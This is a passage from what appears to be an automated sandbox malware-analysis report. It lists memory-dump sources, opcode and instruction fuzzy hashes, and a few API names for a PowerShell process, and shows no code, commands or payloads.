                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c4b90d18ae15808d35e92b44c9750ba0275a5fd573163a1e0ed487c9c1213661
                                                                                        • Instruction ID: 114034d9b18c120183938c1431c54cef9e75878cba69af98ee8efc47cce885a2
                                                                                        • Opcode Fuzzy Hash: c4b90d18ae15808d35e92b44c9750ba0275a5fd573163a1e0ed487c9c1213661
                                                                                        • Instruction Fuzzy Hash: 6CF1D6B5E01216CFEB18CFA8D8916AEBBB1FF59300F544568D501AB392D734A981CFD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 26a6f884ec9d1190c6984b5f0febd81129687eeb5584c0d542ccad373c69decf
                                                                                        • Instruction ID: 4e0a6d06b3342bbab1277550445f9b9c3b84eac4002201447768feb3737997ab
                                                                                        • Opcode Fuzzy Hash: 26a6f884ec9d1190c6984b5f0febd81129687eeb5584c0d542ccad373c69decf
                                                                                        • Instruction Fuzzy Hash: 21E11175A08224CFC718CF78E8906AABBF2FF8E315F1944ADD58297391D730A905CB50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 184f556f7e444d6be6a7f2f2ce4d03849e5c49160ab2e6c80573f75c0f93bab5
                                                                                        • Instruction ID: dedbf643659f3266cd5c9d79446a042d310da3d82bf4ad95aa1554d647691be9
                                                                                        • Opcode Fuzzy Hash: 184f556f7e444d6be6a7f2f2ce4d03849e5c49160ab2e6c80573f75c0f93bab5
                                                                                        • Instruction Fuzzy Hash: BBB16D756046104BEB109F28DC827BBBBE1FF91354F08896CE996D7391E378D845C36A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 473b38a73a66e4465c6ed8eb35a7fbcd675989359a64f79cf0b0cfe86da2a1f1
                                                                                        • Instruction ID: f8b0bc84d4e983985e5ef5eebebf267cf3bc36061111252c9b9c78854d41ce98
                                                                                        • Opcode Fuzzy Hash: 473b38a73a66e4465c6ed8eb35a7fbcd675989359a64f79cf0b0cfe86da2a1f1
                                                                                        • Instruction Fuzzy Hash: 0CA1AA75204B06CFD7248F25EC91B27B7F1FB9A310F008968E55A87BA0D730A859EB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 65e674c370fc7506e933932f9d5c36b96245d8dadcb4382c6dec1dc363024ce5
                                                                                        • Instruction ID: 7f182db6df052c5c5c1920c4b4475e078e082addcb1d742c0268f789172375d3
                                                                                        • Opcode Fuzzy Hash: 65e674c370fc7506e933932f9d5c36b96245d8dadcb4382c6dec1dc363024ce5
                                                                                        • Instruction Fuzzy Hash: B691FE71204B06DFD7258F25EC81B27BBF1FF9A310F148968E956877A1C730A819EB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: b36fc5937ec8e07493889934c83d6c7470a105bbe4342825be15fd877e6b6db1
                                                                                        • Instruction ID: 94874fe3bf132f04acc3586a45abd9c38b4427a749a4203f01f4c2ae84e1b8fd
                                                                                        • Opcode Fuzzy Hash: b36fc5937ec8e07493889934c83d6c7470a105bbe4342825be15fd877e6b6db1
                                                                                        • Instruction Fuzzy Hash: 8681DEB5204B01DFD7258F25EC81B27B7F1FF99310F048968E55A87BA1D730A859EB60
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0c1776a435a136a8ffaafb1bea4c09826118f5a11d20ee3c13c4ec062bad286d
                                                                                        • Instruction ID: 6b15eaa2142acfea121117bbf86e4ceeb4cebd34ab3e3ee65a6db91f21f68855
                                                                                        • Opcode Fuzzy Hash: 0c1776a435a136a8ffaafb1bea4c09826118f5a11d20ee3c13c4ec062bad286d
                                                                                        • Instruction Fuzzy Hash: A68181B0910B008BD3209F39C9566A7BFF1FF56310F548A2DD4D68B794E335A41ACB92
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3168b190ed4141c7efb0b97b537427f337573b584fde68645c34f43a83d72bad
                                                                                        • Instruction ID: 48ca38e736f16a2c37d50cb2248c46d102d876d33bdf774e3e77c3416f81900c
                                                                                        • Opcode Fuzzy Hash: 3168b190ed4141c7efb0b97b537427f337573b584fde68645c34f43a83d72bad
                                                                                        • Instruction Fuzzy Hash: 97515533B296610BC71CCA388C5256BBAD3AFCAB10F1D853ED485D7396DA38DD068781
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e133961311d72293b0a26691fbfbc6da36099cff5a31e56eb1443f9d38243a85
                                                                                        • Instruction ID: 0adff22136200231bce154edd3c37901b35347a5090e3fd68161f5ade6f48542
                                                                                        • Opcode Fuzzy Hash: e133961311d72293b0a26691fbfbc6da36099cff5a31e56eb1443f9d38243a85
                                                                                        • Instruction Fuzzy Hash: EC612575A083924FC7258F69C88092E7FE1BF96314F48C2ADF8A54B3D2D675D805C7A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 081468ba0f1bfab35942c528ec52b3467fe23ba39eacbbebfe3f669dc854281b
                                                                                        • Instruction ID: 7a92f2f3e2ac5e6eafe1f76a69a32350e0d015ed13a616e6bfb6a9c13271210b
                                                                                        • Opcode Fuzzy Hash: 081468ba0f1bfab35942c528ec52b3467fe23ba39eacbbebfe3f669dc854281b
                                                                                        • Instruction Fuzzy Hash: 18511231A18202CFE718CF28DC8176AB7B6FF98350F48896CE586873A5C739E955DB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 0e4c6540644104ccf3c06d31a70bad9bf521596a6f4372a100f614f03a7e83cc
                                                                                        • Instruction ID: a4685d1b4dd8b58012c444efe1a50abb1ff48173ef3e98e1b4965610a38a1371
                                                                                        • Opcode Fuzzy Hash: 0e4c6540644104ccf3c06d31a70bad9bf521596a6f4372a100f614f03a7e83cc
                                                                                        • Instruction Fuzzy Hash: 1651CEB5604B01DFC7259F25EC84A26B7F5FFA9305F008868E55A83B71D731A868EF21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ccd86834270160d91b91c88426076482cb970ba956a4702c3eccb9a8f0dab054
                                                                                        • Instruction ID: aa83f97d4d5e45f75b9b6fe454a6c26f15fe91ba919bebfb7092cd860fe6ea8a
                                                                                        • Opcode Fuzzy Hash: ccd86834270160d91b91c88426076482cb970ba956a4702c3eccb9a8f0dab054
                                                                                        • Instruction Fuzzy Hash: 3451CE31A18202CFE718CF28D85176AB7A2FB98351F48897CE586C7395C739DA55DB40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: e9acc3889d79f5a221b79a752ad0fd50959e3832481baac8a6e21d75a2995aeb
                                                                                        • Instruction ID: f71e6ecc86121912b99b8ed0f227ab28ba2dc5d4afb1117e54b8f315ca667c72
                                                                                        • Opcode Fuzzy Hash: e9acc3889d79f5a221b79a752ad0fd50959e3832481baac8a6e21d75a2995aeb
                                                                                        • Instruction Fuzzy Hash: EE215731B0A218EBF7188B6CE880ABE7FB7FB59300F5806ACD14257662C7306C42C6D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 3bde463f0f6c04a5daacf87a0145e3949ab8936bc2f3e71d9b54e42b82a876eb
                                                                                        • Instruction ID: 211ba252fe13f86b5e1232fd0ef95cb4018cf116bfb10aad62574d78ac78bddb
                                                                                        • Opcode Fuzzy Hash: 3bde463f0f6c04a5daacf87a0145e3949ab8936bc2f3e71d9b54e42b82a876eb
                                                                                        • Instruction Fuzzy Hash: 27216B729083285BD724DF18E8816BAFBA6FFDA310F18845DE8D4973A1D631AD51C7D0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 5273c994ba3bf1e7eb6b10b9edc81530a406faa8053784146ec9082db12463ec
                                                                                        • Instruction ID: 2cb07e94c7aa3cd22dc8ab1e3c146e75d7918933750405e5498fd82db10b0665
                                                                                        • Opcode Fuzzy Hash: 5273c994ba3bf1e7eb6b10b9edc81530a406faa8053784146ec9082db12463ec
                                                                                        • Instruction Fuzzy Hash: 85018E72D51610CBE728CE60DC8173B7791FB99311F88492CE985A32E1E6206C45DAD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: InitializeThunk
                                                                                        • String ID:
                                                                                        • API String ID: 2994545307-0
                                                                                        • Opcode ID: 4fdc80c67b39aa0110a3e6794b16e9e2544ba2dc009c0e5f10f2377ba4ce065b
                                                                                        • Instruction ID: 3fd8ecb9d67fe4fb781ebcbb9b4b6e32b8399c7aa281a9e3a870c81ec19f9328
                                                                                        • Opcode Fuzzy Hash: 4fdc80c67b39aa0110a3e6794b16e9e2544ba2dc009c0e5f10f2377ba4ce065b
                                                                                        • Instruction Fuzzy Hash: 901150B5D183249BD3249E54BD4172A7991B798B00F14851CEBC0A72E5E9708C4096C4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                        • Instruction ID: 9abaf4d44a4d673099c635086ec20afbb1e31468f17ca234c03012ade21820fe
                                                                                        • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                        • Instruction Fuzzy Hash: 86110633A051E40EC3168D3C9444669BFE32F93634F194799E4B89F2D2D6238DCA8B50
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d931a03cc70c10d7111e64b824a11218f7167014e8a345f12e32dc7c7ec5f04f
                                                                                        • Instruction ID: 54ac56ef062977b01c0d3d948e3bdfdb09137cdd2fc4a441af77b70add6ec5f7
                                                                                        • Opcode Fuzzy Hash: d931a03cc70c10d7111e64b824a11218f7167014e8a345f12e32dc7c7ec5f04f
                                                                                        • Instruction Fuzzy Hash: 9801D4F560030157FB209E5598D0B7BBAA87F80708F08483CE92547242DB7DFD45C2A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 39672de40dc4472e2769c20bba9ee57655c4d668340bd6f9cabb571b1edffe67
                                                                                        • Instruction ID: 23efa33cb21aca1310c62d51ef3a0045dfb3c5578c18749c97c7dc6d4e601542
                                                                                        • Opcode Fuzzy Hash: 39672de40dc4472e2769c20bba9ee57655c4d668340bd6f9cabb571b1edffe67
                                                                                        • Instruction Fuzzy Hash: AD01A421604792CBE715CF3A8450677FFE2BFE3310F189599C0D69B2D2C634A98ACB51
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7c57178cc8e0840735ab973033a5ccd9f449b95052c24dd3031e005403d6a4bf
                                                                                        • Instruction ID: f4bf005e27002b60193b1e20215a6fba78d0d581aa3af0a5a70cf9216c0eac87
                                                                                        • Opcode Fuzzy Hash: 7c57178cc8e0840735ab973033a5ccd9f449b95052c24dd3031e005403d6a4bf
                                                                                        • Instruction Fuzzy Hash: 77F0F677E041A04FC324C93CE488668BFA1BFDB220B190698DA69EB3D1E6219C858F40
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d0c2837e2f5322fb5633f7227b7e63df22d16532e45c2695a81ad6b97559852f
                                                                                        • Instruction ID: fab991da86a26c2a9c27da03b4c86ab671cbe841e0169dec18a15c1602bc3243
                                                                                        • Opcode Fuzzy Hash: d0c2837e2f5322fb5633f7227b7e63df22d16532e45c2695a81ad6b97559852f
                                                                                        • Instruction Fuzzy Hash: 41B0121088C6504981048D00804047AFAF44547002F013149A4C863413C024C1404908
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461817124.000000000052F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4461883407.0000000000532000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000008.00000002.4462000591.0000000000540000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_8_2_4f0000_powershell.jbxd
                                                                                        Similarity
                                                                                        • API ID: MetricsSystem$DeleteObject
                                                                                        • String ID:
                                                                                        • API String ID: 4263548647-3916222277
                                                                                        • Opcode ID: 27707b535d3b9e1ee7a7e2a0295577b41ecb54697afbbd9f5c54ce6729dc25ef
                                                                                        • Instruction ID: a2b2c54bcb5a356ab8a6c3d975aeddd27c365e0b07893d1825a5cedf90510cd5
                                                                                        • Opcode Fuzzy Hash: 27707b535d3b9e1ee7a7e2a0295577b41ecb54697afbbd9f5c54ce6729dc25ef
                                                                                        • Instruction Fuzzy Hash: 6941D5B09143548FCB00EFA8E99465DBBF0FB58304F00592EE898DB394D774A948CF82
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000008.00000002.4460827755.00000000004F1000.00000020.00000400.00020000.00000000.sdmp, Offset: 004F0000, based on PE: true
                                                                                        • Associated: 00000008.00000002.4460787915.00000000004F0000.00000040.00000400.00020000.00000000.sdmpDownload File
